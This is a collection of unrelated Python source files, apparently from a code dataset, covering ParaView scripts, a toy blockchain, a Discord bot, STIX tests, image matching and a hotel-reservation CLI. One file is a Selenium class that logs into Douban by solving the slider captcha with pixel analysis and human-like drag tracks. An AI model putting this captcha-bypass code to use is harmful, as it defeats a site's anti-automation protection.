self._ctx[0], tag_buf, tag_len
)
self._backend._check_cipher_response(res)
self._backend._release_cipher_ctx(self._ctx)
self._tag = self._backend._ffi.buffer(tag_buf)[:]
if (self._operation == self._backend._lib.kCCDecrypt and
not constant_time.bytes_eq(
self._tag[:len(self._mode.tag)], self._mode.tag
)):
raise InvalidTag
return b""
def authenticate_additional_data(self, data):
res = self._backend._lib.CCCryptorGCMAddAAD(
self._ctx[0], data, len(data)
)
self._backend._check_cipher_response(res)
tag = utils.read_only_property("_tag")
|
StarcoderdataPython
|
1861583
|
import csv
from math import sqrt
from paraview import servermanager
from paraview.simple import *
YIELD_STRENGTH = 1.6e8
def get_mean_component(array, component_index):
array_length = array.GetNumberOfTuples()
return sum(array.GetComponent(i, component_index) for i in range(array_length)) / array_length
def get_max_component(array, component_index):
array_length = array.GetNumberOfTuples()
return max(array.GetComponent(i, component_index) for i in range(array_length))
reader = PVDReader(FileName=r"C:\Projects\effective_yield_surface\calc.pvd")
data = servermanager.Fetch(reader)
point_data = data.GetPointData()
stress = point_data.GetArray("Stress")
max_mises_stress = get_max_component(stress, 6)
scale_coefficient = YIELD_STRENGTH / max_mises_stress
averaged_stress = [
[get_mean_component(stress, 0), get_mean_component(stress, 3)],
[get_mean_component(stress, 3), get_mean_component(stress, 1)],
]
principial_averaged_stress = [
(averaged_stress[0][0] + averaged_stress[1][1]) / 2
+ sqrt(((averaged_stress[0][0] - averaged_stress[1][1]) / 2) ** 2 + averaged_stress[0][1] ** 2),
(averaged_stress[0][0] + averaged_stress[1][1]) / 2
- sqrt(((averaged_stress[0][0] - averaged_stress[1][1]) / 2) ** 2 + averaged_stress[0][1] ** 2),
]
with open("outs.csv", "a+") as outs:
outs.write(
"{},{}\n".format(
principial_averaged_stress[0] / YIELD_STRENGTH * scale_coefficient,
principial_averaged_stress[1] / YIELD_STRENGTH * scale_coefficient,
)
)
outs.write(
"{},{}\n".format(
principial_averaged_stress[1] / YIELD_STRENGTH * scale_coefficient,
principial_averaged_stress[0] / YIELD_STRENGTH * scale_coefficient,
)
)
|
StarcoderdataPython
|
9660854
|
<reponame>EdinburghGenomics/hesiod<filename>hesiod_version.py
#!/usr/bin/env python3
from hesiod import hesiod_version
print("{}".format(hesiod_version))
|
StarcoderdataPython
|
271997
|
from util import hash_util
import hashlib
class Verification:
@classmethod
def validate_j_chain(cls, chain):
for (index, block) in enumerate(chain):
if index > 0:
if block.previous_hash != hash_util.hash_block(chain[index - 1]):
print("Die chain wurde geändert")
return False
if not cls.check_valid_proof(block.transactions[:-1], block.previous_hash, block.proof):
print("Proof of work is not valid")
return False
return True
@staticmethod
def verify_transaction(transaction, sender, get_balance):
return get_balance(sender) >= transaction.amount
@staticmethod
def check_valid_proof(transactions, last_hash, proof):
guess = (str([transaction.to_odered_dict() for transaction in transactions]) + str(last_hash) + str(
proof)).encode()
guess_hash = hashlib.sha3_256(guess).hexdigest()
return guess_hash[0:2] == '00'
|
StarcoderdataPython
|
8127415
|
# 4. Write a python program that deletes a car from the server using the API.
import requests
import json
url = 'http://127.0.0.1:5000/cars/08%20c%201234'
response = requests.delete(url)
print(response.status_code)
print(response.text)
|
StarcoderdataPython
|
12803815
|
"""
This file provides a single interface to unittest objects for our
tests while supporting python < 2.7 via unittest2.
If you need something from the unittest namespace it should be
imported here from the relevant module and then imported into your
test from here
"""
# Import python libs
import os
import sys
# support python < 2.7 via unittest2
if sys.version_info[0:2] < (2,7):
try:
from unittest2 import TestLoader, TextTestRunner,\
TestCase, expectedFailure, \
TestSuite
except ImportError:
print("You need to install unittest2 to run the salt tests")
sys.exit(1)
else:
from unittest import TestLoader, TextTestRunner,\
TestCase, expectedFailure, \
TestSuite
# Set up paths
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
SALT_LIBS = os.path.dirname(TEST_DIR)
sys.path.insert(0, TEST_DIR)
sys.path.insert(0, SALT_LIBS)
|
StarcoderdataPython
|
126251
|
<filename>setup.py<gh_stars>0
from setuptools import find_packages, setup
setup(name='sacred_logs',
version='0.2.0',
install_requires=['click', 'matplotlib', 'pandas'],
packages=find_packages(),
entry_points="""
[console_scripts]
sacredlogs=sacred_logs.cli:cli
""")
|
StarcoderdataPython
|
8122347
|
import sys
import traceback
import discord
from bot.utils import wrap_in_code
from discord.ext import commands
ignored_errors = (
commands.CommandNotFound,
commands.DisabledCommand,
commands.NotOwner,
)
error_types = (
(commands.CommandOnCooldown, "Cooldown"),
(commands.UserInputError, "Bad input"),
(commands.CheckFailure, "Check failed"),
)
class Errors(commands.Cog):
"""Error handlers"""
def __init__(self, bot):
self.bot = bot
super().__init__()
async def report_error(self, error, *, fields):
exception = "".join(
traceback.format_exception(type(error), error, error.__traceback__)
)
print(exception, file=sys.stderr)
embed = discord.Embed(
title="Unhandled error", description=wrap_in_code(exception, block="py")
)
for field in fields:
embed.add_field(**field)
info = await self.bot.application_info()
await info.owner.send(embed=embed)
async def on_error(self, event, *args, **kwargs):
error = sys.exc_info()[1]
await self.report_error(
error,
fields=[
{
"name": "Event",
"value": f"```{event}```",
"inline": False,
},
*(
{
"name": f"args[{index!r}]",
"value": wrap_in_code(repr(arg), block=True),
"inline": False,
}
for index, arg in enumerate(args)
),
*(
{
"name": f"kwargs[{index!r}]",
"value": wrap_in_code(repr(arg), block=True),
"inline": False,
}
for index, arg in kwargs.items()
),
],
)
@commands.Cog.listener()
async def on_command_error(self, ctx: commands.Context, error):
error = getattr(error, "original", error)
if isinstance(error, ignored_errors):
return
for (error_type, error_msg) in error_types:
if isinstance(error, error_type):
await ctx.send(
embed=discord.Embed(title=error_msg, description=str(error)),
)
return
await self.report_error(
error,
fields=[
{
"name": "Message",
"value": ctx.message.content,
"inline": False,
},
],
)
def setup(bot):
bot.add_cog(Errors(bot))
|
StarcoderdataPython
|
8138126
|
<filename>stix2elevator/test/test_main.py
# Standard Library
from argparse import Namespace
import io
import os
# external
import pytest
from stix.core import STIXPackage
import stixmarx
# internal
from stix2elevator import elevate, options
from stix2elevator.options import (
ElevatorOptions, get_option_value, initialize_options, set_option_value
)
from stix2elevator.utils import find_dir, get_environment_variable_value
# This module only tests for the main functions used to interact with the elevator from a programmatic or
# interactive point of view. Actual idioms tests are done in test_idioms.py
def setup_options():
version = get_environment_variable_value('VERSION', "2.1")
policy = get_environment_variable_value("MISSING_POLICY", "ignore")
initialize_options()
set_option_value("missing_policy", policy)
set_option_value("log_level", "DEBUG")
set_option_value("spec_version", version)
set_option_value("validator_args", "--version " + version)
set_option_value("policy", "no_policy")
@pytest.mark.parametrize("opts", [
ElevatorOptions(policy="no_policy", spec_version=get_environment_variable_value('VERSION'), log_level="DEBUG", disabled=[212, 901]),
{"policy": "no_policy", "spec_version": get_environment_variable_value('VERSION'), "log_level": "DEBUG", "disabled": [212, 901]},
Namespace(policy="no_policy", spec_version=get_environment_variable_value('VERSION'), log_level="DEBUG", disabled="212,901",
file_=None, incidents=False, missing_policy=get_environment_variable_value("MISSING_POLICY"),
custom_property_prefix="elevator", infrastructure=False, package_created_by_id=None,
default_timestamp=None, validator_args="--strict-types", enabled=None, silent=False,
message_log_directory=None, output_directory=None, markings_allowed="", acs=False),
])
def test_setup_options(opts):
options.ALL_OPTIONS = None # To make sure we can set it again
initialize_options(opts)
assert get_option_value("policy") == "no_policy"
assert get_option_value("spec_version") == get_environment_variable_value('VERSION')
assert get_option_value("log_level") == "DEBUG"
assert get_option_value("disabled") == [212, 901]
def test_elevate_with_marking_container():
setup_options()
directory = os.path.dirname(__file__)
xml_idioms_dir = find_dir(directory, "idioms-xml")
archive_file = os.path.join(xml_idioms_dir, "141-TLP-marking-structures.xml")
with io.open(archive_file, mode="r", encoding="utf-8") as f:
input_stix = f.read()
container = stixmarx.parse(io.StringIO(input_stix))
json_result = elevate(container)
assert json_result
print(json_result)
def test_elevate_with_stix_package():
setup_options()
directory = os.path.dirname(__file__)
xml_idioms_dir = find_dir(directory, "idioms-xml")
archive_file = os.path.join(xml_idioms_dir, "141-TLP-marking-structures.xml")
with io.open(archive_file, mode="r", encoding="utf-8") as f:
input_stix = f.read()
json_result = elevate(STIXPackage.from_xml(io.StringIO(input_stix)))
assert json_result
print(json_result)
def test_elevate_with_text_string():
setup_options()
directory = os.path.dirname(__file__)
xml_idioms_dir = find_dir(directory, "idioms-xml")
archive_file = os.path.join(xml_idioms_dir, "141-TLP-marking-structures.xml")
with io.open(archive_file, mode="r", encoding="utf-8") as f:
input_stix = f.read()
json_result = elevate(input_stix)
assert json_result
print(json_result)
def test_elevate_with_binary_string():
setup_options()
directory = os.path.dirname(__file__)
xml_idioms_dir = find_dir(directory, "idioms-xml")
archive_file = os.path.join(xml_idioms_dir, "141-TLP-marking-structures.xml")
with io.open(archive_file, mode="rb") as f:
input_stix = f.read()
json_result = elevate(input_stix)
assert json_result
print(json_result)
def test_elevate_with_file():
setup_options()
directory = os.path.dirname(__file__)
xml_idioms_dir = find_dir(directory, "idioms-xml")
archive_file = os.path.join(xml_idioms_dir, "141-TLP-marking-structures.xml")
json_result = elevate(archive_file)
assert json_result
print(json_result)
|
StarcoderdataPython
|
6554234
|
<reponame>Hephaest/DoubanCrawler
import requests, json
from selenium import common
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from PIL import Image
import time
class LoginCracker:
def __init__(self, username, password, driver, wait, progress_bar, style):
self.login_url = "https://accounts.douban.com/passport/login"
self.driver = driver
self.wait = wait
self.username = username
self.password = password
self.actual_block_width = 50
self.progress_bar = progress_bar
self.style = style
def login_with_captcha(self):
try:
# 步骤一:获得拼图块
block_top, block_left, block_width = self.get_captcha(self.driver, self.wait, "slideBlock")
# 步骤二:获得背景图
slideBkg = self.get_captcha(self.driver, self.wait, "slideBkg", block_top, block_left, block_width)
# 步骤三:获得的缺口处的左边距 + 拼块的右空白间隙 = 要移动的距离
distance = self.get_distance(slideBkg) + self.actual_block_width + (
block_width - self.actual_block_width) / 2
# 步骤四:模拟人的行为习惯(先匀加速拖动后匀减速拖动)
tracks = self.get_tracks(distance)
# 步骤五:按照轨迹拖动,验证成功
drag_button = self.wait.until(EC.presence_of_element_located((By.ID, 'tcaptcha_drag_button')))
ActionChains(self.driver).click_and_hold(drag_button).perform()
for track in tracks:
ActionChains(self.driver).move_by_offset(xoffset=track, yoffset=0).perform()
time.sleep(0.1) # 0.1秒后释放鼠标
ActionChains(self.driver).release().perform()
# 此处等待是为了 POST 请求传输成功,成功后会跳转到账户主页面
try:
time.sleep(3)
self.driver.find_element_by_id("slideBlock")
self.login_with_captcha()
except common.exceptions.NoSuchElementException:
self.driver.switch_to.default_content()
self.progress_bar['value'] = 20
self.style.configure("green.Horizontal.TProgressbar", text="20%")
return "识破验证码,已登录。"
except:
self.driver.refresh()
self.login()
def click_submit(self):
try:
login_by_password = self.wait.until(EC.element_to_be_clickable((By.CLASS_NAME, "account-tab-account")))
login_by_password.click()
input_username = self.driver.find_element_by_id('username')
input_password = self.driver.find_element_by_id('password')
input_username.send_keys(self.username)
input_password.send_keys(<PASSWORD>)
submit_button = self.wait.until(EC.element_to_be_clickable((By.LINK_TEXT, "登录豆瓣")))
submit_button.click()
except common.exceptions.NoSuchElementException:
self.driver.refresh()
self.click_submit()
except common.exceptions.TimeoutException:
return "豆瓣可能检测到你的行为!稍等片刻,请勿多次尝试。"
try:
popup_frame = self.wait.until(EC.presence_of_element_located((By.TAG_NAME, 'iframe')))
self.driver.switch_to.frame(popup_frame)
time.sleep(3)
self.driver.find_element_by_id("slideBlock")
return self.login_with_captcha()
except common.exceptions.NoSuchElementException:
try:
self.driver.find_element_by_id("capImg")
except common.exceptions.NoSuchElementException:
self.progress_bar['value'] = 20
self.style.configure("green.Horizontal.TProgressbar", text="20%")
return "跳过验证码,已登录。"
def get_captcha(self, driver, wait, id_name, top=0, left=0, width=0):
try:
img = wait.until(EC.presence_of_element_located((By.ID, id_name)))
except common.exceptions.TimeoutException:
return "请求超时。"
time.sleep(3) # 保证图片刷新出来
captcha = self.get_screenshot(driver, id_name, img.size)
if left == 0:
css_style = '{\"' + img.get_attribute('style').replace(' ', '').replace('px', '').replace(';', ', \"') \
.replace(':', '\": ').strip(', \"') + '}'
block_json = json.loads(css_style)
return block_json['top'], block_json['left'], block_json['width']
else:
captcha = captcha.crop((left + width, top, img.size['width'], top + width))
captcha.save('Images/' + id_name + '.png')
return captcha
def get_screenshot(self, driver, id_name, adjust_size):
file_path = 'Images/' + id_name + '.png'
driver.find_element_by_id(id_name).screenshot(file_path)
Image.open(file_path).resize((adjust_size['width'], adjust_size['height']), Image.ANTIALIAS).save(file_path)
return Image.open(file_path)
def get_distance(self, slideBkg):
img_rgb = slideBkg.convert('RGB')
for i in range(0, slideBkg.size[0] - 1, 3):
R, G, B = img_rgb.getpixel((i, 20))
if R < 100 and G < 100 and B < 100 and i > slideBkg.size[0] / 2:
RGB = img_rgb.getpixel((i + 5, 20))
if RGB[0] < 100 and RGB[1] < 100 and RGB[2] < 100:
return i
def get_tracks(self, distance):
# 初速度
v = 0
# 单位时间为0.2s来统计轨迹,轨迹即0.2内的位移
t = 1
# 位移/轨迹列表,列表内的一个元素代表0.2s的位移
tracks = []
# 当前的位移
current = 0
# 到达mid值开始减速
mid = distance / 2
while current < distance:
a = 30 if current < mid else -40
# 初速度
v0 = v
# 0.2秒时间内的位移
s = v0 * t + 0.5 * a * (t ** 2)
if s < distance - current:
# 添加到轨迹列表
tracks.append(round(s))
# 当前的位置
current += s
# 速度已经达到v,该速度作为下次的初速度
v = v0 + a * t
else:
tracks.append(int(distance - current))
return tracks
def login(self):
self.driver.get(self.login_url)
try:
return self.click_submit()
except requests.exceptions.ConnectionError:
self.driver.close()
return "网络恍惚!稍后再试!"
|
StarcoderdataPython
|
3480018
|
<gh_stars>1-10
###############################################################################
#
# Exceptions - A class for XlsxWriter exceptions.
#
# Copyright 2013-2019, <NAME>, <EMAIL>
#
class XlsxWriterException(Exception):
"""Base exception for XlsxWriter."""
class XlsxInputError(XlsxWriterException):
"""Base exception for all input data related errors."""
class XlsxFileError(XlsxWriterException):
"""Base exception for all file related errors."""
class EmptyChartSeries(XlsxInputError):
"""Chart must contain at least one data series."""
class DuplicateTableName(XlsxInputError):
"""Worksheet table name already exists."""
class InvalidWorksheetName(XlsxInputError):
"""Worksheet name is too long or contains restricted characters."""
class DuplicateWorksheetName(XlsxInputError):
"""Worksheet name already exists."""
class ReservedWorksheetName(XlsxInputError):
"""Worksheet name 'History' is reserved by Excel."""
class UndefinedImageSize(XlsxFileError):
"""No size data found in image file."""
class UnsupportedImageFormat(XlsxFileError):
"""Unsupported image file format."""
|
StarcoderdataPython
|
1759163
|
<filename>alfirt.opencv/src/algorithms/SURFFlannMatchingAlgorithm.py<gh_stars>1-10
'''
Created on Sep 9, 2011
@author: Ankhazam & Piotr & OpenCV team
'''
from algorithms.AlgorithmBase import AlgorithmBase
import classification.SURFFlannMatcher as SFM
import classification.TrainedObject as TO
import image.ImageDescriptionReader as IDR
import image.ImageDescriptionWriter as IDW
import common.Utils as TU
import cv2
import os
import shutil
class SURFFlannMatchingAlgorithm(AlgorithmBase):
'''
Simple algorithm used for matching orientations using Flann matching method.
'''
def __init__(self, threshold=400):
'''
Constructor
'''
self.threshold = threshold
def __train(self, learningPath):
'''
Trains the system with new object data
@param learningPath: Has to be root of the following structure
@param threshold: SURF Hessian threshold used for training
learningPath
|_ObjectA
| |_1.imd, 1.ren
| |_...
|_ObjectB
| |_...
|_ObjectC
|_...
@return: List of @see: TrainedObject
'''
trainedObjects = list() # list of trained objects
trainingUtils = TU.Utils(self.threshold)
for (root, dirs, files) in os.walk(learningPath):
if len(dirs) == 0: # we're in an object folder
# ObjectFilename
objName = os.path.basename(root)
print "root: ", objName
# currently trained object
trainedObject = TO.TrainedObject(objName, self.threshold)
# real training
for file1 in files: # we won't implement natural human sorting
# do not use .* and *.imd files
if file1.startswith('.') or file1.endswith(".imd"):
continue
# fetching ImageDescription
imDescPath = os.path.join(root, file1[:-4]) + ".imd"
print "imd: ", imDescPath
with open(imDescPath, 'r') as imDF:
# read this file using reader
reader = IDR.ImageDescriptionReader()
imageDesc = reader.read(imDF)
# fetching relevant SURF features
imagePath = os.path.join(root, file1)
image = cv2.imread(imagePath)
(keypoints, descriptors) = trainingUtils.findSURF(image, self.threshold)
# adding orientation to trainedObject
trainedObject.addOrientation(self.threshold, (imageDesc, keypoints, descriptors, imagePath))
# once trained all orientations we can add the object to the DBase
trainedObjects.append(trainedObject)
return trainedObjects
def learn(self, inputFolder):
self.trainedObjects = self.__train(inputFolder)
def test(self, inputFolder, outputFolder):
cvUtilities = TU.Utils(self.threshold)
imageDescWriter = IDW.ImageDescriptionWriter()
for file1 in os.listdir(inputFolder):
# do not use .* files
if file1.startswith("."):
continue
# save output (the name of the object without .bmp / .jpg etc)
fileName = os.path.basename(file1)
fileName = os.path.splitext(fileName)[0]
imgOutPath = os.path.join(outputFolder, fileName)
if not os.path.exists(imgOutPath):
os.mkdir(imgOutPath)
# with image files do ...
if not file1.endswith(".imd"):
# flags are set to 0 = meaning grey scale
testImage = cv2.imread(os.path.join(inputFolder, file1), flags=0)
utils = TU.Utils(self.threshold)
(kp, desc) = utils.findSURF(testImage, self.threshold)
print "Loaded test image : '%s'" % file1
kpImage = cv2.imread(os.path.join(inputFolder, file1))
utils.drawKeypoints(kpImage, kp, color=(255, 255, 0))
cv2.imwrite(os.path.join(outputFolder, file1), kpImage)
matcher = SFM.SURFFlannMatcher(self.trainedObjects, self.threshold)
match = matcher.matchObject(testImage)
print "Finished processing file '%s'" % file1
for obj in match:
print "Object Name: ", obj[0].name
print "OrientationName: ", obj[0].orientations[obj[1]][0].name
with open(os.path.join(imgOutPath, "computed") + ".imd", 'w') as fileStream:
imageDescWriter.write(fileStream, obj[0].orientations[obj[1]][0])
matchedPath = obj[0].orientations[obj[1]][3]
#show the match
matchedImage = cv2.imread(matchedPath, cv2.IMREAD_GRAYSCALE)
vis = utils.draw_match(matchedImage, testImage, obj[4][0], obj[4][1], obj[2], obj[3])
# show image
cv2.imshow("match!", vis)
cv2.waitKey()
# with .imd files to this
else :
src = os.path.join(inputFolder, file1)
dst = os.path.join(imgOutPath, "expected.imd")
print "Coping the file '%s' into '%s'" % (src, dst)
shutil.copyfile(src, dst)
|
StarcoderdataPython
|
11230155
|
from .upload import UploadImporter
from .vandy import VandyImporter
available_importers = {
cls.__name__: cls
for cls in [
UploadImporter,
VandyImporter,
]
}
|
StarcoderdataPython
|
13178
|
<filename>2808.py
def conv(s):
if s[0] == 'a': v = '1'
elif s[0] == 'b': v = '2'
elif s[0] == 'c': v = '3'
elif s[0] == 'd': v = '4'
elif s[0] == 'e': v = '5'
elif s[0] == 'f': v = '6'
elif s[0] == 'g': v = '7'
elif s[0] == 'h': v = '8'
v += s[1]
return v
e = str(input()).split()
a = conv(e[0])
b = conv(e[1])
ax = int(a[0])
ay = int(a[1])
bx = int(b[0])
by = int(b[1])
if (abs(ax - bx) == 1 and abs(ay - by) == 2) or (abs(ax - bx) == 2 and abs(ay - by) == 1):
print('VALIDO')
else: print('INVALIDO')
|
StarcoderdataPython
|
8030330
|
from hermes.core.attributes import set_encoder
from hermes.language import Language
from hermes.tag.pos import PartOfSpeech
import hermes.types as htypes
"""
Copyright 2017 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__author__ = '<NAME>'
set_encoder(htypes.PART_OF_SPEECH, lambda x: PartOfSpeech.of(x))
set_encoder(htypes.LANGUAGE, lambda x: Language.of(x))
|
StarcoderdataPython
|
395727
|
from collections import defaultdict, Counter
import csv
import random
import json
from nltk.metrics import agreement
# constants
HITID = "HITId"
LABEL = "Answer.political bias.label"
WORKERID = "WorkerId"
WORKTIME = "WorkTimeInSeconds"
APPROVE = "Approve"
TEXT = "Input.text"
sample_path = "amt_output_csv/abortion_batch_results.csv"
class CorpusAnalysis(object):
def __init__(self, data_path):
self.table_titiles = list()
# ['HITId', 'HITTypeId', 'Title', 'Description', 'Keywords', 'Reward', 'CreationTime', 'MaxAssignments', 'RequesterAnnotation', 'AssignmentDurationInSeconds', 'AutoApprovalDelayInSeconds', 'Expiration', 'NumberOfSimilarHITs', 'LifetimeInSeconds', 'AssignmentId', 'WorkerId', 'AssignmentStatus', 'AcceptTime', 'SubmitTime', 'AutoApprovalTime', 'ApprovalTime', 'RejectionTime', 'RequesterFeedback', 'WorkTimeInSeconds', 'LifetimeApprovalRate', 'Last30DaysApprovalRate', 'Last7DaysApprovalRate', 'Input.video_title', 'Input.policy', 'Input.media', 'Input.text', 'Answer.political bias.label', 'Approve', 'Reject']
self.full_table = list()
self.hitid_labels = defaultdict(list)
self.hitid_goldlabel = defaultdict(str)
self.hitid_majoritylabel = defaultdict(str)
self.hit_adjudicate = defaultdict(list)
with open(data_path, mode="r") as infile:
reader = csv.reader(infile)
for i, row in enumerate(reader):
if i == 0:
self.table_titiles = row
else:
self.full_table.append(row)
self.hitid_labels[row[0]].append(row[-1])
self.title_index = {k: v for v, k in enumerate(self.table_titiles)}
self.policy = self.full_table[0][self.title_index["Input.policy"]]
def populate_hitid_goldlabel(self):
# get the majority voting as the gold label in hit_goldlabel
# me as adjudicator breaking ties manually in hit_adjudicate
for k, v in self.hitid_labels.items():
majority_label = Counter(v).most_common()[0][0]
majority_label_count = Counter(v).most_common()[0][1]
if len(v) == 3 and majority_label_count != 1:
self.hitid_goldlabel[k] = majority_label
self.hitid_majoritylabel[k] = majority_label
else:
self.hit_adjudicate[k] = v
# get Majority aggregation/ties
# print(len(self.hit_goldlabel))
# print(len(self.hit_adjudicate.keys()))
##TODO:change this when get full data and manually adjudicated
for k, v in self.hit_adjudicate.items():
self.hitid_goldlabel[k] = v[0]
# adjudicate, get the gold labels
for row in self.full_table:
hit_id = row[self.title_index[HITID]]
label = row[self.title_index[LABEL]]
if label == self.hitid_goldlabel.get(hit_id, "non-exist"):
row.append("Approved")
else:
row.append("Rejected")
# get label distribution:
# print(Counter(self.hit_goldlabel.values()))
# print("*****************************************")
def turker_accuracy(self):
# get how many turkers got it right/wrong
adjudication_list = list()
for row in self.full_table:
adjudication_list.append(row[-1])
# print("*****************************************")
# print(Counter(adjudication_list))
worker_app_rej = defaultdict(list)
for row in self.full_table:
if row[self.title_index[APPROVE]] == "Approved":
if worker_app_rej[row[self.title_index[WORKERID]]]:
worker_app_rej[row[self.title_index[WORKERID]]][0] += 1
else:
worker_app_rej[row[self.title_index[WORKERID]]].append(1)
worker_app_rej[row[self.title_index[WORKERID]]].append(0)
else:
if worker_app_rej[row[self.title_index[WORKERID]]]:
worker_app_rej[row[self.title_index[WORKERID]]][1] += 1
else:
worker_app_rej[row[self.title_index[WORKERID]]].append(0)
worker_app_rej[row[self.title_index[WORKERID]]].append(1)
worker_error_rate = {
k: [v[0] / (v[0] + v[1]), v[0] + v[1]] for k, v in worker_app_rej.items()
}
sorted_worker_error_rate = {
k: v
for k, v in sorted(
worker_error_rate.items(), key=lambda item: item[1][1], reverse=True
)
}
with open("turker_accuracy/{}.json".format(self.policy), "w") as f:
json.dump(sorted_worker_error_rate, f, indent=2)
x = sum(a[0] for a in sorted_worker_error_rate.values())
y = sum(a[1] for a in sorted_worker_error_rate.values())
length = len(sorted_worker_error_rate)
return x / length, y / length
# def get_iaa(self):
# iaa_data = list()
# prev_hitid = full_table[0][title_index[HITID]]
# for i in range(0, len(full_table), 3):
# iaa_data.append([0, full_table[i][title_index[HITID]], full_table[i][title_index[LABEL]]])
# iaa_data.append([1, full_table[i+1][title_index[HITID]], full_table[i+1][title_index[LABEL]]])
# iaa_data.append([2, full_table[i+2][title_index[HITID]], full_table[i+2][title_index[LABEL]]])
#
# task = agreement.AnnotationTask(data=iaa_data)
# print(task.kappa())
# print(task.alpha())
def get_data(self):
self.hitid_text = defaultdict(str)
for row in self.full_table:
self.hitid_text[row[self.title_index[HITID]]] = row[self.title_index[TEXT]]
text_adjudicate = set()
for id in self.hit_adjudicate:
text_adjudicate.add(self.hitid_text[id])
# print(text_adjudicate)
# with open('tied_sents/{}.txt'.format(self.policy), 'w') as f:
# f.write("\n\n".join(text_adjudicate))
def get_training_data(self):
data = [["text", "label"]]
for id, label in self.hitid_goldlabel.items():
data.append([self.hitid_text[id], label])
with open("unsplitted_data/{}.csv".format(self.policy), "w") as out:
csv_out = csv.writer(out)
for row in data:
csv_out.writerow(row)
def get_avg_accuracy(self):
agreed = 0
disagreed = 0
for id, labels_list in self.hitid_labels.items():
for label in labels_list:
if label == self.hitid_goldlabel[id]:
agreed += 1
else:
disagreed += 1
return agreed / (agreed + disagreed)
def get_wawa(self):
agreed = 0
disagreed = 0
for id, labels_list in self.hitid_labels.items():
for label in labels_list:
if label == self.hitid_majoritylabel[id]:
agreed += 1
else:
disagreed += 1
return agreed / (agreed + disagreed)
def get_random_sampling_accuracy(self, num_sample=100):
keys = random.sample(self.hitid_labels.keys(), num_sample)
agreed = 0
disagreed = 0
for id in keys:
for label in self.hitid_labels[id]:
if label == self.hitid_goldlabel[id]:
agreed += 1
else:
disagreed += 1
return agreed / (agreed + disagreed)
if __name__ == "__main__":
policies = [
"healthcare",
"economic",
"immigration",
"education",
"abortion",
"LGBTQ",
"gun",
"environment",
]
data_paths = [
"amt_output_csv/{}_batch_results.csv".format(policy) for policy in policies
]
for path in data_paths:
ca = CorpusAnalysis(path)
ca.populate_hitid_goldlabel()
print(ca.turker_accuracy())
ca.get_data()
ca.get_training_data()
# print("*******************************")
# print(ca.get_avg_accuracy())
# print(ca.get_wawa())
# print(ca.get_random_sampling_accuracy())
# path = '/Users/jinzhao/Desktop/4th_semester/thesis/thesis/amt_output_csv/healthcare_batch_results.csv'
# ca = CorpusAnalysis(path)
# ca.populate_hitid_goldlabel()
# ca.turker_accuracy()
# ca.get_data()
# ca.get_training_data()
|
StarcoderdataPython
|
4993683
|
<reponame>mihailoz/python-term-project
# -*- coding: utf-8 -*-
import dao.ReservationDAO as ReservationDAO
import manager.PermissionManager as PermissionManager
import manager.HotelManager as HotelManager
import manager.RoomManager as RoomManager
import dao.HotelDAO as HotelDAO
def make_reservation(person):
if PermissionManager.has_permission_view_hotel(person):
print("You will be guided step by step to make your reservation. If you want to cancel at any point type '/cancel'")
HotelManager.get_with_options(person, [])
hotel_id = input("Choose a hotel by entering its ID >> ")
if hotel_id != '/cancel':
hotel = HotelDAO.get_by_id(hotel_id)
if hotel is not None:
from_date = input("Choose first day of your reservation (YYYY-MM-DD format) >> ")
if from_date != '/cancel':
to_date = input("Choose last day of your reservation (YYYY-MM-DD format) >> ")
if to_date != '/cancel':
RoomManager.get_rooms_by_hotel(person, hotel_id)
room_id = input("Choose room by entering its ID >> ")
if room_id != '/cancel':
result = ReservationDAO.make_reservation(person, room_id, from_date, to_date)
if result:
print("Reservation made successfully.")
else:
print("Reservation unsuccessful.")
return result
return False
else:
print("Forbidden. You are missing necessary permissions.")
return False
def list_reservations(person):
results = ReservationDAO.list_reservations(person)
print(format_reservation_header())
for result in results:
print(format_reservation(result))
return True
def format_reservation_header():
return \
"| Hotel name | From | To | Total price\n" \
"|-----------------------------+------------+------------+------------"
def format_reservation(reservation):
return u"| {0:28.28}| {1:11}| {2:11}| {3:9.2f}".format(
reservation['name'],
reservation['from_date'],
reservation['to_date'],
reservation['total_price'])
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.